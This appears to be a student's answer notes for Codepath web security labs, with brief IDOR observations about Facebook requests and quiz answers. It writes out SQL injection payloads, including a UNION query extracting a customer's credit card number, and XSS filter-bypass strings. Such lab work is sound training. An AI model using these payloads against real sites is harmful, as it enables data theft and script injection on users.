Codepath Web Securities labs
Insecure Direct Object Reference:
-
Go to https://facebook.com. What is the Cache-Control header set to in the response? Enter as a comma-delimited list below. Order doesn't matter, and values are case insensitive.
private, no-cache, no-store, must-revalidate
-
What is the URI for liking a Facebook post on your homepage? Hint: https://www.quora.com/What-does-Facebook-refer-to-as-UFI
/ufi/reaction/?dpr=1
-
When posting your status to Facebook, which query parameter contains the text of your message? Hint: Make sure you're not filtering out URIs like: ajax/updatestatus
xhpc_message_text
SQL injections:
- To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key.
Please enter the Customer Id of the user that you want to look up:
SELECT * FROM customers WHERE customerId ="1" OR '1' = '1'; -- ";
- To complete this challenge, you must exploit the SQL injection flaw in the following form to find the result key.
Please enter the Customer Email of the user that you want to look up:
SELECT * FROM customers WHERE customerEmail ="samman@gmail.com' OR '1' = '1'; -- "@gmail.com
-
To complete this challenge, you must exploit SQL injection flaw in the following form to find the result key. The developer of this level has attempted to stop SQL Injection attacks by escaping apostrophes so the database interpreter will know not to pay attention to user submitted apostrophes.
SELECT * FROM customers WHERE customerId ="2\' OR 1 = 1;-- ";
-
To complete this challenge, you must exploit a SQL injection issue in the following sub application to acquire the credit card number from one of the customers that has a customer name of Mary Martin. Mary's credit card number is the result key to this challenge.
SELECT customerName from customers where customerName='Mary MArtin' Union select CreditCardNumber from customers where customerName="mary martin"; #
Cross Site Scripting One
-
Find a XSS vulnerability in the following form. It would appear that your input is been filtered! Please enter the Search Term that you want to look up
<IMG SRC="#" ONERROR="alert('XSS')"/>
-
Find a XSS vulnerability in the following form. It would appear that your input is been filtered! Please enter the Search Term that you want to look up
<IMG SRC="#" ONMESSAGE="alert('XSS')"/>
-
In this one, the developer is completely removing the handler name.
<SCRonmessageIPT>alert('XSS')</SCRonmessageIPT>
-
Demonstrate a XSS vulnerability in the following form by executing a JavaScript alert command. The developers had heard that escaping is a better way of fixing XSS issues but they were not totally clear on how to implement it.
Please enter the URL that you wish to post to your public profile;
http://www.google.com" oNmessage=alert()>
Question answers:
- Name of a database of information-security vulnerabilities maintained with funding from the US government. Identifiers for this database are a popular way to reference vulnerabilities (1 word, acronym):
CVE
- What is the name of a large network of compromised machines?
botnet
- What is the name of the hacking technique often used to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication?
Phising
- V arire zvff n orng
rot13
- What TCP port does the HTTP protocol commonly use?
80
- What is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application? (three words)
Command injection (not working right now)
- What TCP port does HTTPS commonly use?
443